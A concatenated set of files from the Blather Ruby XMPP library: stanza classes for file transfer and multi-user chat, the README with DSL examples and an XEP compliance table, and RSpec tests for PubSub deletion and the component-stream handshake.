# @param [Time, nil] date the last modification time of the file
def date=(date)
# Serialized as xs:dateTime; nil clears the attribute
write_attr :date, (date ? date.xmlschema : nil)
end
# Get the size
#
# Non-numeric attribute values are treated as absent (nil)
#
# @return [Fixnum, nil]
def size
if (s = read_attr(:size)) && (s =~ /^\d+$/)
s.to_i
else
nil
end
end
# Set the size
#
# @param [Fixnum, nil] size the size, in bytes, of the file
def size=(size)
write_attr :size, size
end
# Get the desc
#
# @return [String, nil]
def desc
content_from 'ns:desc', :ns => self.class.registered_ns
end
# Set the desc
#
# @param [String, nil] desc the description of the file
def desc=(desc)
set_content_for :desc, desc
end
# Find or create range node
#
# @return [Si::Si::File::Range]
def range
Range.find_or_create self
end
end
# Range stanza fragment
class Range < XMPPNode
register :range, 'http://jabber.org/protocol/si/profile/file-transfer'
# Create a new Si::Si::File::Range object
#
# @param [XML::Node, nil] node a node to inherit from
#
# @return [Si::Si::File::Range]
def self.new(offset = nil, length = nil)
new_node = super :range
# First argument doubles as either a node to inherit or an offset
case offset
when Nokogiri::XML::Node
new_node.inherit offset
else
new_node.offset = offset
new_node.length = length
end
new_node
end
# Find or create range node in file node and converts it to Si::Si::File::Range
#
# @param [Si::Si::File] parent a file node where to find or create range
#
# @return [Si::Si::File::Range]
def self.find_or_create(parent)
if found_range = parent.find_first('//ns:range', :ns => self.registered_ns)
range = self.new found_range
found_range.remove
else
range = self.new
end
parent << range
range
end
# Get the offset
#
# Non-numeric attribute values are treated as absent (nil)
#
# @return [Fixnum, nil]
def offset
if (o = read_attr(:offset)) && (o =~ /^\d+$/)
o.to_i
else
nil
end
end
# Set the offset
#
# @param [Fixnum, nil] offset the position, in bytes, to start transferring the file data from
def offset=(offset)
write_attr :offset, offset
end
# Get the length
#
# Non-numeric attribute values are treated as absent (nil)
#
# @return [Fixnum, nil]
def length
if (l = read_attr(:length)) && (l =~ /^\d+$/)
l.to_i
else
nil
end
end
# Set the length
#
# @param [Fixnum, nil] length the number of bytes to retrieve starting at offset
def length=(length)
write_attr :length, length
end
end
end
end
end
end
end
<file_sep>/README.md
# Blather
[](https://rubygems.org/gems/blather)
[](http://travis-ci.org/adhearsion/blather)
[](https://gemnasium.com/adhearsion/blather)
[](https://codeclimate.com/github/adhearsion/blather)
[](https://coveralls.io/r/adhearsion/blather)
[](http://inch-ci.org/github/adhearsion/blather)
XMPP DSL (and more) for Ruby written on [EventMachine](http://rubyeventmachine.com/) and [Nokogiri](http://nokogiri.org/).
`develop` branch contains breaking changes scheduled for release in v3.0.0
## Features
* evented architecture
* uses Nokogiri
* simplified starting point
## Project Pages
* [GitHub](https://github.com/adhearsion/blather)
* [Rubygems](http://rubygems.org/gems/blather)
* [API Documentation](http://rdoc.info/gems/blather/file/README.md)
* [Google Group](http://groups.google.com/group/xmpp-blather)
# Usage
## Installation
gem install blather
## Example
Blather comes with a DSL that makes writing XMPP bots quick and easy. See the examples directory for more advanced examples.
```ruby
require 'blather/client'
setup 'echo@jabber.local', 'echo'
# Auto approve subscription requests
subscription :request? do |s|
write_to_stream s.approve!
end
# Echo back what was said
message :chat?, :body do |m|
write_to_stream m.reply
end
```
The above example is for a standalone script, and [can be run as a command line program](https://github.com/adhearsion/blather#on-the-command-line). If you wish to integrate Blather into an existing application, you will need to avoid `blather/client` and instead do something like this:
```ruby
require 'blather/client/dsl'
module App
extend Blather::DSL
def self.run
EM.run { client.run }
end
setup 'echo@jabber.local', 'echo'
# Auto approve subscription requests
subscription :request? do |s|
write_to_stream s.approve!
end
# Echo back what was said
message :chat?, :body do |m|
write_to_stream m.reply
end
end
trap(:INT) { EM.stop }
trap(:TERM) { EM.stop }
App.run
```
If you need to ensure that Blather does not block the rest of your application, run the reactor in a new thread:
```ruby
Thread.new { App.run }
```
You can additionally send messages like so:
```ruby
App.say 'someone@example.com', 'Hello there!'
```
## Handlers
Handlers let Blather know how you'd like each type of stanza to be well.. handled. Each type of stanza has an associated handler which is part of a handler hierarchy. In the example above we're handling message and subscription stanzas.
XMPP is built on top of three main stanza types (presence, message, and iq). All other stanzas are built on these three base types. This creates a natural hierarchy of handlers. For example a subscription stanza is a type of presence stanza and can be processed by a subscription handler or a presence handler. Likewise, a PubSub::Items stanza has its own identifier :pubsub_items but it's also a :pubsub_node, :iq and :stanza. Any or each of these could be used to handle the PubSub::Items stanza. If you've done any DOM programming you'll be familiar with this.
Incoming stanzas will be handled by the first handler found. Unlike the DOM this will stop the handling bubble unless the handler returns false.
The entire handler hierarchy can be seen below.
### Example
Here we have a presence handler and a subscription handler. When this script receives a subscription stanza the subscription handler will be notified first. If that handler doesn't know what to do it can return false and let the stanza bubble up to the presence handler.
```ruby
# Handle all presence stanzas
presence do |stanza|
# do stuff
end
# Handle all subscription stanzas
subscription do |stanza|
# do stuff
end
```
Additionally, handlers may be 'guarded'. That is, they may have conditions set declaratively, against which the stanza must match in order to trigger the handler.
```ruby
# Will only be called for messages where #chat? responds positively
# and #body == 'exit'
message :chat?, :body => 'exit'
```
### Non-Stanza Handlers
So far there are two non-stanza related handlers.
```ruby
# Called after the connection has been connected. It's good for initializing
# your system.
# DSL:
when_ready {}
# Client:
client.register_handler(:ready) {}
# Called after the connection has been terminated. Good for teardown or
# automatic reconnection.
# DSL:
disconnected {}
# Client
client.register_handler(:disconnected) {}
# The following will reconnect every time the connection is lost:
disconnected { client.connect }
```
### Handler Guards
Guards are a concept borrowed from Erlang. They help to better compartmentalize handlers.
There are a number of guard types and one bit of special syntax. Guards act like AND statements. Each condition must be met if the handler is to
be used.
```ruby
# Equivalent to saying (stanza.chat? && stanza.body)
message :chat?, :body
```
The different types of guards are:
```ruby
# Symbol
# Checks for a non-false reply to calling the symbol on the stanza
# Equivalent to stanza.chat?
message :chat?
# Hash with any value (:body => 'exit')
# Calls the key on the stanza and checks for equality
# Equivalent to stanza.body == 'exit'
message :body => 'exit'
# Hash with regular expression (:body => /exit/)
# Calls the key on the stanza and checks for a match
# Equivalent to stanza.body.match /exit/
message :body => /exit/
# Hash with array (:name => [:gone, :forbidden])
# Calls the key on the stanza and check for inclusion in the array
# Equivalent to [:gone, :forbidden].include?(stanza.name)
stanza_error :name => [:gone, :forbidden]
# Proc
# Calls the proc passing in the stanza
# Checks that the ID is divisible by 3
message proc { |m| m.id % 3 == 0 }
# Array
# Use arrays with the previous types effectively turns the guard into
# an OR statement.
# Equivalent to stanza.body == 'foo' || stanza.body == 'baz'
message [{:body => 'foo'}, {:body => 'baz'}]
# XPath
# Runs the xpath query on the stanza and checks for results
# This guard type cannot be combined with other guards
# Equivalent to !stanza.find('/iq/ns:pubsub', :ns => 'pubsub:namespace').empty?
# It also passes two arguments into the handler block: the stanza and the result
# of the xpath query.
iq '/iq/ns:pubsub', :ns => 'pubsub:namespace' do |stanza, xpath_result|
# stanza will be the original stanza
# xpath_result will be the pubsub node in the stanza
end
```
### Filters
Blather provides before and after filters that work much the way regular
handlers work. Filters come in a before and after flavor. They're called in
order of definition and can be guarded like handlers.
```ruby
before { |s| "I'm run before any handler" }
before { |s| "I'm run next" }
before(:message) { |s| "I'm only run in front of message stanzas" }
before(nil, :id => 1) { |s| "I'll only be run when the stanza's ID == 1" }
# ... handlers
after { |s| "I'm run after everything" }
```
### Handlers Hierarchy
```
stanza
|- iq
| |- pubsub_node
| | |- pubsub_affiliations
| | |- pubsub_create
| | |- pubsub_items
| | |- pubsub_publish
| | |- pubsub_retract
| | |- pubsub_subscribe
| | |- pubsub_subscription
| | |- pubsub_subscriptions
| | `- pubsub_unsubscribe
| |- pubsub_owner
| | |- pubsub_delete
| | `- pubsub_purge
| `- query
| |- disco_info
| |- disco_items
| `- roster
|- message
| `- pubsub_event
`- presence
|- status
`- subscription
error
|- argument_error
|- parse_error
|- sasl_error
|- sasl_unknown_mechanism
|- stanza_error
|- stream_error
|- tls_failure
`- unknown_response_error
```
## On the Command Line
Default usage is:
```
[blather_script] [options] node@domain.com/resource password [host] [port]
```
Command line options:
```
-D, --debug Run in debug mode (you will see all XMPP communication)
-d, --daemonize Daemonize the process
--pid=[PID] Write the PID to this file
--log=[LOG] Write to the [LOG] file instead of stdout/stderr
-h, --help Show this message
-v, --version Show version
```
## Health warning
Some parts of Blather will allow you to do stupid things that don't conform to XMPP
spec. You should exercise caution and read the relevant specifications (indicated in
the preamble to most relevant classes).
## Spec compliance
Blather provides support in one way or another for many XMPP specifications. Below is a list of specifications and the status of support for them in Blather. This list *may not be correct*. If the list indicates a lack of support for a specification you wish to use, you are encouraged to check that this is correct. Likewise, if you find an overstatement of Blather's spec compliance, please point this out. Also note that even without built-in support for a specification, you can still manually construct and parse stanzas alongside use of Blather's built-in helpers.
Specification | Support | Name | Notes
---------------------------------------------------- | ------- | ---- | -----
[RFC 6120](http://tools.ietf.org/html/rfc6120) | Full | XMPP: Core |
[RFC 6121](http://tools.ietf.org/html/rfc6121) | Full | XMPP: Instant Messaging and Presence |
[RFC 6122](http://tools.ietf.org/html/rfc6122) | Full | XMPP: Address Format |
[XEP-0001](http://xmpp.org/extensions/xep-0001.html) | N/A | XMPP Extension Protocols |
[XEP-0002](http://xmpp.org/extensions/xep-0002.html) | N/A | Special Interest Groups (SIGs) |
[XEP-0004](http://xmpp.org/extensions/xep-0004.html) | Partial | Data Forms |
[XEP-0009](http://xmpp.org/extensions/xep-0009.html) | None | Jabber-RPC |
[XEP-0012](http://xmpp.org/extensions/xep-0012.html) | None | Last Activity |
[XEP-0013](http://xmpp.org/extensions/xep-0013.html) | None | Flexible Offline Message Retrieval |
[XEP-0016](http://xmpp.org/extensions/xep-0016.html) | None | Privacy Lists |
[XEP-0019](http://xmpp.org/extensions/xep-0019.html) | N/A | Streamlining the SIGs |
[XEP-0020](http://xmpp.org/extensions/xep-0020.html) | Partial | Feature Negotiation |
[XEP-0027](http://xmpp.org/extensions/xep-0027.html) | None | Current Jabber OpenPGP Usage |
[XEP-0030](http://xmpp.org/extensions/xep-0030.html) | Partial | Service Discovery |
[XEP-0033](http://xmpp.org/extensions/xep-0033.html) | None | Extended Stanza Addressing |
[XEP-0045](http://xmpp.org/extensions/xep-0045.html) | Partial | Multi-User Chat |
[XEP-0047](http://xmpp.org/extensions/xep-0047.html) | None | In-Band Bytestreams |
[XEP-0048](http://xmpp.org/extensions/xep-0048.html) | None | Bookmarks |
[XEP-0049](http://xmpp.org/extensions/xep-0049.html) | None | Private XML Storage |
[XEP-0050](http://xmpp.org/extensions/xep-0050.html) | Partial | Ad-Hoc Commands |
[XEP-0053](http://xmpp.org/extensions/xep-0053.html) | None | XMPP Registrar Function |
[XEP-0054](http://xmpp.org/extensions/xep-0054.html) | None | vcard-temp |
[XEP-0055](http://xmpp.org/extensions/xep-0055.html) | None | Jabber Search |
[XEP-0059](http://xmpp.org/extensions/xep-0059.html) | None | Result Set Management |
[XEP-0060](http://xmpp.org/extensions/xep-0060.html) | Partial | Publish-Subscribe |
[XEP-0065](http://xmpp.org/extensions/xep-0065.html) | None | SOCKS5 Bytestreams |
[XEP-0066](http://xmpp.org/extensions/xep-0066.html) | None | Out of Band Data |
[XEP-0068](http://xmpp.org/extensions/xep-0068.html) | None | Field Standardization for Data Forms |
[XEP-0070](http://xmpp.org/extensions/xep-0070.html) | None | Verifying HTTP Requests via XMPP |
[XEP-0071](http://xmpp.org/extensions/xep-0071.html) | Partial | XHTML-IM |
[XEP-0072](http://xmpp.org/extensions/xep-0072.html) | None | SOAP Over XMPP |
[XEP-0076](http://xmpp.org/extensions/xep-0076.html) | None | Malicious Stanzas |
[XEP-0077](http://xmpp.org/extensions/xep-0077.html) | Full | In-Band Registration |
[XEP-0079](http://xmpp.org/extensions/xep-0079.html) | None | Advanced Message Processing |
[XEP-0080](http://xmpp.org/extensions/xep-0080.html) | None | User Location |
[XEP-0082](http://xmpp.org/extensions/xep-0082.html) | None | XMPP Date and Time Profiles |
[XEP-0083](http://xmpp.org/extensions/xep-0083.html) | None | Nested Roster Groups |
[XEP-0084](http://xmpp.org/extensions/xep-0084.html) | None | User Avatar |
[XEP-0085](http://xmpp.org/extensions/xep-0085.html) | Partial | Chat State Notifications |
[XEP-0092](http://xmpp.org/extensions/xep-0092.html) | None | Software Version |
[XEP-0095](http://xmpp.org/extensions/xep-0095.html) | Partial | Stream Initiation |
[XEP-0096](http://xmpp.org/extensions/xep-0096.html) | Partial | SI File Transfer |
[XEP-0100](http://xmpp.org/extensions/xep-0100.html) | None | Gateway Interaction |
[XEP-0106](http://xmpp.org/extensions/xep-0106.html) | None | JID Escaping |
[XEP-0107](http://xmpp.org/extensions/xep-0107.html) | None | User Mood |
[XEP-0108](http://xmpp.org/extensions/xep-0108.html) | None | User Activity |
[XEP-0114](http://xmpp.org/extensions/xep-0114.html) | Full | Jabber Component Protocol |
[XEP-0115](http://xmpp.org/extensions/xep-0115.html) | Partial | Entity Capabilities |
[XEP-0118](http://xmpp.org/extensions/xep-0118.html) | None | User Tune |
[XEP-0122](http://xmpp.org/extensions/xep-0122.html) | None | Data Forms Validation |
[XEP-0124](http://xmpp.org/extensions/xep-0124.html) | None | Bidirectional-streams Over Synchronous HTTP (BOSH) |
[XEP-0126](http://xmpp.org/extensions/xep-0126.html) | None | Invisibility |
[XEP-0127](http://xmpp.org/extensions/xep-0127.html) | None | Common Alerting Protocol (CAP) Over XMPP |
[XEP-0128](http://xmpp.org/extensions/xep-0128.html) | None | Service Discovery Extensions |
[XEP-0130](http://xmpp.org/extensions/xep-0130.html) | None | Waiting Lists |
[XEP-0131](http://xmpp.org/extensions/xep-0131.html) | None | Stanza Headers and Internet Metadata |
[XEP-0132](http://xmpp.org/extensions/xep-0132.html) | None | Presence Obtained via Kinesthetic Excitation (POKE) |
[XEP-0133](http://xmpp.org/extensions/xep-0133.html) | None | Service Administration |
[XEP-0134](http://xmpp.org/extensions/xep-0134.html) | None | XMPP Design Guidelines |
[XEP-0136](http://xmpp.org/extensions/xep-0136.html) | None | Message Archiving |
[XEP-0137](http://xmpp.org/extensions/xep-0137.html) | None | Publishing Stream Initiation Requests |
[XEP-0138](http://xmpp.org/extensions/xep-0138.html) | None | Stream Compression |
[XEP-0141](http://xmpp.org/extensions/xep-0141.html) | None | Data Forms Layout |
[XEP-0143](http://xmpp.org/extensions/xep-0143.html) | None | Guidelines for Authors of XMPP Extension Protocols |
[XEP-0144](http://xmpp.org/extensions/xep-0144.html) | N/A | Roster Item Exchange |
[XEP-0145](http://xmpp.org/extensions/xep-0145.html) | None | Annotations |
[XEP-0146](http://xmpp.org/extensions/xep-0146.html) | None | Remote Controlling Clients |
[XEP-0147](http://xmpp.org/extensions/xep-0147.html) | None | XMPP URI Scheme Query Components |
[XEP-0148](http://xmpp.org/extensions/xep-0148.html) | None | Instant Messaging Intelligence Quotient (IM IQ) |
[XEP-0149](http://xmpp.org/extensions/xep-0149.html) | None | Time Periods |
[XEP-0153](http://xmpp.org/extensions/xep-0153.html) | None | vCard-Based Avatars |
[XEP-0155](http://xmpp.org/extensions/xep-0155.html) | None | Stanza Session Negotiation |
[XEP-0156](http://xmpp.org/extensions/xep-0156.html) | None | Discovering Alternative XMPP Connection Methods |
[XEP-0157](http://xmpp.org/extensions/xep-0157.html) | None | Contact Addresses for XMPP Services |
[XEP-0158](http://xmpp.org/extensions/xep-0158.html) | None | CAPTCHA Forms |
[XEP-0160](http://xmpp.org/extensions/xep-0160.html) | None | Best Practices for Handling Offline Messages |
[XEP-0163](http://xmpp.org/extensions/xep-0163.html) | Partial | Personal Eventing Protocol |
[XEP-0166](http://xmpp.org/extensions/xep-0166.html) | None | Jingle |
[XEP-0167](http://xmpp.org/extensions/xep-0167.html) | None | Jingle RTP Sessions |
[XEP-0169](http://xmpp.org/extensions/xep-0169.html) | None | Twas The Night Before Christmas (Jabber Version) |
[XEP-0170](http://xmpp.org/extensions/xep-0170.html) | None | Recommended Order of Stream Feature Negotiation |
[XEP-0171](http://xmpp.org/extensions/xep-0171.html) | None | Language Translation |
[XEP-0172](http://xmpp.org/extensions/xep-0172.html) | None | User Nickname |
[XEP-0174](http://xmpp.org/extensions/xep-0174.html) | None | Serverless Messaging |
[XEP-0175](http://xmpp.org/extensions/xep-0175.html) | None | Best Practices for Use of SASL ANONYMOUS |
[XEP-0176](http://xmpp.org/extensions/xep-0176.html) | None | Jingle ICE-UDP Transport Method |
[XEP-0177](http://xmpp.org/extensions/xep-0177.html) | None | Jingle Raw UDP Transport Method |
[XEP-0178](http://xmpp.org/extensions/xep-0178.html) | None | Best Practices for Use of SASL EXTERNAL with Certificates |
[XEP-0182](http://xmpp.org/extensions/xep-0182.html) | N/A | Application-Specific Error Conditions |
[XEP-0183](http://xmpp.org/extensions/xep-0183.html) | None | Jingle Telepathy Transport |
[XEP-0184](http://xmpp.org/extensions/xep-0184.html) | None | Message Delivery Receipts |
[XEP-0185](http://xmpp.org/extensions/xep-0185.html) | None | Dialback Key Generation and Validation |
[XEP-0191](http://xmpp.org/extensions/xep-0191.html) | None | Blocking Command |
[XEP-0198](http://xmpp.org/extensions/xep-0198.html) | None | Stream Management |
[XEP-0199](http://xmpp.org/extensions/xep-0199.html) | Partial | XMPP Ping |
[XEP-0201](http://xmpp.org/extensions/xep-0201.html) | None | Best Practices for Message Threads |
[XEP-0202](http://xmpp.org/extensions/xep-0202.html) | None | Entity Time |
[XEP-0203](http://xmpp.org/extensions/xep-0203.html) | Partial | Delayed Delivery |
[XEP-0205](http://xmpp.org/extensions/xep-0205.html) | None | Best Practices to Discourage Denial of Service Attacks |
[XEP-0206](http://xmpp.org/extensions/xep-0206.html) | None | XMPP Over BOSH |
[XEP-0207](http://xmpp.org/extensions/xep-0207.html) | None | XMPP Eventing via Pubsub |
[XEP-0220](http://xmpp.org/extensions/xep-0220.html) | None | Server Dialback |
[XEP-0221](http://xmpp.org/extensions/xep-0221.html) | None | Data Forms Media Element |
[XEP-0222](http://xmpp.org/extensions/xep-0222.html) | None | Persistent Storage of Public Data via PubSub |
[XEP-0223](http://xmpp.org/extensions/xep-0223.html) | None | Persistent Storage of Private Data via PubSub |
[XEP-0224](http://xmpp.org/extensions/xep-0224.html) | None | Attention |
[XEP-0227](http://xmpp.org/extensions/xep-0227.html) | None | Portable Import/Export Format for XMPP-IM Servers |
[XEP-0229](http://xmpp.org/extensions/xep-0229.html) | None | Stream Compression with LZW |
[XEP-0231](http://xmpp.org/extensions/xep-0231.html) | None | Bits of Binary |
[XEP-0233](http://xmpp.org/extensions/xep-0233.html) | None | Domain-Based Service Names in XMPP SASL Negotiation |
[XEP-0234](http://xmpp.org/extensions/xep-0234.html) | None | Jingle File Transfer |
[XEP-0239](http://xmpp.org/extensions/xep-0239.html) | None | Binary XMPP |
[XEP-0242](http://xmpp.org/extensions/xep-0242.html) | None | XMPP Client Compliance 2009 |
[XEP-0243](http://xmpp.org/extensions/xep-0243.html) | None | XMPP Server Compliance 2009 |
[XEP-0245](http://xmpp.org/extensions/xep-0245.html) | None | The /me Command |
[XEP-0249](http://xmpp.org/extensions/xep-0249.html) | None | Direct MUC Invitations |
[XEP-0256](http://xmpp.org/extensions/xep-0256.html) | None | Last Activity in Presence |
[XEP-0258](http://xmpp.org/extensions/xep-0258.html) | None | Security Labels in XMPP |
[XEP-0260](http://xmpp.org/extensions/xep-0260.html) | None | Jingle SOCKS5 Bytestreams Transport Method |
[XEP-0261](http://xmpp.org/extensions/xep-0261.html) | None | Jingle In-Band Bytestreams Transport Method |
[XEP-0262](http://xmpp.org/extensions/xep-0262.html) | None | Use of ZRTP in Jingle RTP Sessions |
[XEP-0263](http://xmpp.org/extensions/xep-0263.html) | None | ECO-XMPP |
[XEP-0266](http://xmpp.org/extensions/xep-0266.html) | None | Codecs for Jingle Audio |
[XEP-0267](http://xmpp.org/extensions/xep-0267.html) | None | Server Buddies |
[XEP-0270](http://xmpp.org/extensions/xep-0270.html) | None | XMPP Compliance Suites 2010 |
[XEP-0273](http://xmpp.org/extensions/xep-0273.html) | None | Stanza Interception and Filtering Technology (SIFT) |
[XEP-0277](http://xmpp.org/extensions/xep-0277.html) | None | Microblogging over XMPP |
[XEP-0278](http://xmpp.org/extensions/xep-0278.html) | None | Jingle Relay Nodes |
[XEP-0280](http://xmpp.org/extensions/xep-0280.html) | None | Message Carbons |
[XEP-0288](http://xmpp.org/extensions/xep-0288.html) | None | Bidirectional Server-to-Server Connections |
[XEP-0292](http://xmpp.org/extensions/xep-0292.html) | None | vCard4 Over XMPP |
[XEP-0293](http://xmpp.org/extensions/xep-0293.html) | None | Jingle RTP Feedback Negotiation |
[XEP-0294](http://xmpp.org/extensions/xep-0294.html) | None | Jingle RTP Header Extensions Negotiation |
[XEP-0295](http://xmpp.org/extensions/xep-0295.html) | None | JSON Encodings for XMPP |
[XEP-0296](http://xmpp.org/extensions/xep-0296.html) | None | Best Practices for Resource Locking |
[XEP-0297](http://xmpp.org/extensions/xep-0297.html) | None | Stanza Forwarding |
[XEP-0298](http://xmpp.org/extensions/xep-0298.html) | None | Delivering Conference Information to Jingle Participants (Coin) |
[XEP-0299](http://xmpp.org/extensions/xep-0299.html) | None | Codecs for Jingle Video |
[XEP-0300](http://xmpp.org/extensions/xep-0300.html) | None | Use of Cryptographic Hash Functions in XMPP |
[XEP-0301](http://xmpp.org/extensions/xep-0301.html) | None | In-Band Real Time Text |
[XEP-0302](http://xmpp.org/extensions/xep-0302.html) | None | XMPP Compliance Suites 2012 |
[XEP-0303](http://xmpp.org/extensions/xep-0303.html) | None | Commenting |
[XEP-0304](http://xmpp.org/extensions/xep-0304.html) | None | Whitespace Keepalive Negotiation |
[XEP-0305](http://xmpp.org/extensions/xep-0305.html) | None | XMPP Quickstart |
[XEP-0306](http://xmpp.org/extensions/xep-0306.html) | None | Extensible Status Conditions for Multi-User Chat |
[XEP-0307](http://xmpp.org/extensions/xep-0307.html) | None | Unique Room Names for Multi-User Chat |
[XEP-0308](http://xmpp.org/extensions/xep-0308.html) | None | Last Message Correction |
[XEP-0309](http://xmpp.org/extensions/xep-0309.html) | None | Service Directories |
[XEP-0310](http://xmpp.org/extensions/xep-0310.html) | None | Presence State Annotations |
[XEP-0311](http://xmpp.org/extensions/xep-0311.html) | None | MUC Fast Reconnect |
[XEP-0312](http://xmpp.org/extensions/xep-0312.html) | None | PubSub Since |
# Contributions
All contributions are welcome, even encouraged. However, contributions must be
well tested. If you send me a branch name to merge, it will get my attention faster
than a change set made directly on master.
# Author
* [<NAME>](http://github.com/sprsquish)
* [Other Contributors](https://github.com/adhearsion/blather/contributors)
# Copyright
Copyright (c) 2012 Adhearsion Foundation Inc. See LICENSE for details.
<file_sep>/lib/blather/stanza/muc/muc_user_base.rb
module Blather
  class Stanza
    class MUC
      # Shared behaviour for MUC stanzas carrying a
      # <x xmlns="http://jabber.org/protocol/muc#user"/> child element.
      #
      # Including classes automatically get the <x/> child created on
      # instantiation and gain password accessors backed by a
      # <password/> node nested inside it.
      module MUCUserBase
        MUC_USER_NAMESPACE = "http://jabber.org/protocol/muc#user"

        # Hook: extend the including class so its .new builds the <x/> child.
        def self.included(klass)
          klass.extend ClassMethods
        end

        module ClassMethods
          # Ensure every freshly built stanza carries the muc#user <x/> child.
          def new(*args)
            stanza = super
            stanza.muc_user
            stanza
          end
        end

        # Drop the <x/> child added during construction before inheriting
        # content from +node+, so imported stanzas don't end up with two.
        def inherit(node)
          muc_user.remove
          super
          self
        end

        # @return [String, nil] content of the <password/> node, if present
        def password
          return unless find_password_node
          password_node.content
        end

        # Set the password, creating the <password/> node if necessary.
        def password=(var)
          password_node.content = var
        end

        # Find or create the muc#user <x/> child element.
        def muc_user
          user = find_first('ns:x', :ns => MUC_USER_NAMESPACE)
          unless user
            user = XMPPNode.new('x', self.document)
            self << user
            user.namespace = self.class.registered_ns
          end
          user
        end

        # Find or create the <password/> node beneath the <x/> child.
        def password_node
          node = find_password_node
          unless node
            node = XMPPNode.new('password', self.document)
            muc_user << node
          end
          node
        end

        # @return [XMPPNode, nil] the <password/> node if one exists
        def find_password_node
          muc_user.find_first 'ns:password', :ns => MUC_USER_NAMESPACE
        end
      end # MUCUserBase
    end # MUC
  end # Stanza
end # Blather
<file_sep>/spec/blather/stanza/pubsub_owner/delete_spec.rb
require 'spec_helper'
require 'fixtures/pubsub'

# Specs for the pubsub#owner <delete/> stanza wrapper.
describe Blather::Stanza::PubSubOwner::Delete do
  it 'registers itself' do
    expect(Blather::XMPPNode.class_from_registration(:delete, 'http://jabber.org/protocol/pubsub#owner')).to eq(Blather::Stanza::PubSubOwner::Delete)
  end

  it 'can be imported' do
    expect(Blather::XMPPNode.parse(<<-NODE)).to be_instance_of Blather::Stanza::PubSubOwner::Delete
      <iq type='set'
          from='<EMAIL>/elsinore'
          to='pubsub.shakespeare.lit'
          id='delete1'>
        <pubsub xmlns='http://jabber.org/protocol/pubsub#owner'>
          <delete node='princely_musings'/>
        </pubsub>
      </iq>
    NODE
  end

  it 'ensures an delete node is present on delete' do
    stanza = Blather::Stanza::PubSubOwner::Delete.new
    expect(stanza.find('//ns:pubsub/ns:delete', :ns => Blather::Stanza::PubSubOwner.registered_ns)).not_to be_empty
  end

  it 'ensures an delete node exists when calling #delete_node' do
    stanza = Blather::Stanza::PubSubOwner::Delete.new
    # Strip the auto-created child, then confirm the accessor recreates it.
    stanza.pubsub.remove_children :delete
    expect(stanza.find('//ns:pubsub/ns:delete', :ns => Blather::Stanza::PubSubOwner.registered_ns)).to be_empty

    expect(stanza.delete_node).not_to be_nil
    expect(stanza.find('//ns:pubsub/ns:delete', :ns => Blather::Stanza::PubSubOwner.registered_ns)).not_to be_empty
  end

  it 'defaults to a set node' do
    stanza = Blather::Stanza::PubSubOwner::Delete.new
    expect(stanza.type).to eq(:set)
  end

  it 'sets the host if requested' do
    stanza = Blather::Stanza::PubSubOwner::Delete.new :set, 'pubsub.jabber.local'
    expect(stanza.to).to eq(Blather::JID.new('pubsub.jabber.local'))
  end

  it 'sets the node' do
    stanza = Blather::Stanza::PubSubOwner::Delete.new :set, 'host', 'node-name'
    expect(stanza.node).to eq('node-name')
  end
end
<file_sep>/spec/blather/stream/component_spec.rb
require 'spec_helper'

# Specs for the XEP-0114 external-component stream. These drive a real
# EventMachine reactor against an in-process mock server, so statement
# order inside each example is significant.
describe Blather::Stream::Component do
  let(:client) { mock 'Client' }
  # Randomized to reduce collisions between parallel/repeated runs.
  let(:server_port) { 50000 - rand(1000) }
  let(:jid) { 'comp.id' }

  before do
    # Stub the lifecycle callbacks the stream invokes on its client,
    # unless the mock already has expectations for them.
    [:unbind, :post_init, :jid=].each do |m|
      client.stubs(m) unless client.respond_to?(m)
    end
    client.stubs(:jid).returns jid
  end

  # Boot the reactor with a mock server and a component stream connected
  # to it. +block+ receives (data, server) for each chunk the server
  # reads; +times+ pins the expected number of reads (default: at least 1).
  #
  # NOTE(review): the expectation is set on MockServer while the listener
  # is started with ServerMock — presumably aliases defined in
  # spec/support; verify.
  def mocked_server(times = nil, &block)
    MockServer.any_instance.expects(:receive_data).send(*(times ? [:times, times] : [:at_least, 1])).with &block
    EventMachine::run {
      # Mocked server
      EventMachine::start_server '127.0.0.1', server_port, ServerMock
      # Blather::Stream connection
      EM.connect('127.0.0.1', server_port, Blather::Stream::Component, client, jid, 'secret') { |c| @stream = c }
    }
  end

  it 'can be started' do
    # Only the host/port/client/jid positions of EM.connect are pinned.
    params = [client, 'comp.id', 'secret', 'host', 1234]
    EM.expects(:connect).with do |*parms|
      parms[0] == 'host' &&
      parms[1] == 1234 &&
      parms[3] == client &&
      parms[4] == 'comp.id'
    end

    Blather::Stream::Component.start *params
  end

  it 'shakes hands with the server' do
    # Two reads expected: the stream open, then the handshake digest
    # (SHA1 of stream id concatenated with the shared secret).
    state = nil
    mocked_server(2) do |val, server|
      case state
      when nil
        state = :started
        server.send_data "<?xml version='1.0'?><stream:stream xmlns='jabber:component:accept' xmlns:stream='http://etherx.jabber.org/streams' id='12345'>"
        expect(val).to match(/stream:stream/)

      when :started
        server.send_data '<handshake/>'
        EM.stop
        expect(val).to eq("<handshake>#{Digest::SHA1.hexdigest('12345'+"secret")}</handshake>")
      end
    end
  end

  it 'raises a NoConnection exception if the connection is unbound before it can be completed' do
    expect do
      EventMachine::run {
        # Safety valve so a hung reactor doesn't wedge the suite.
        EM.add_timer(0.5) { EM.stop if EM.reactor_running? }

        Blather::Stream::Component.start client, jid, 'pass', '127.0.0.1', 50000 - rand(1000)
      }
    end.to raise_error Blather::Stream::ConnectionFailed
  end

  it 'starts the stream once the connection is complete' do
    mocked_server(1) { |val, _| EM.stop; expect(val).to match(/stream:stream/) }
  end

  it 'sends stanzas to the client when the stream is ready' do
    client.stubs :post_init
    client.expects(:receive_data).with do |n|
      EM.stop
      n.kind_of? Blather::XMPPNode
    end

    state = nil
    mocked_server(2) do |val, server|
      case state
      when nil
        state = :started
        server.send_data "<?xml version='1.0'?><stream:stream xmlns='jabber:component:accept' xmlns:stream='http://etherx.jabber.org/streams' id='12345'>"
        expect(val).to match(/stream:stream/)

      when :started
        # Accept the handshake, then push a message stanza at the client.
        server.send_data '<handshake/>'
        server.send_data "<message to='comp.id' from='d@e/f' type='chat' xml:lang='en'><body>Message!</body></message>"
        expect(val).to eq("<handshake>#{Digest::SHA1.hexdigest('12345'+"secret")}</handshake>")
      end
    end
  end

  it 'sends stanzas to the wire ensuring "from" is set' do
    # Run EM.next_tick callbacks inline so #send_data fires synchronously.
    EM.expects(:next_tick).at_least(1).yields
    msg = Blather::Stanza::Message.new '<EMAIL>', 'body'
    comp = Blather::Stream::Component.new nil, client, 'jid.com', 'pass'
    comp.expects(:send_data).with { |s| expect(s).to match(/^<message[^>]*from="jid\.com"/) }
    comp.send msg
  end
end
<file_sep>/spec/blather/stanza/iq/ibr_spec.rb
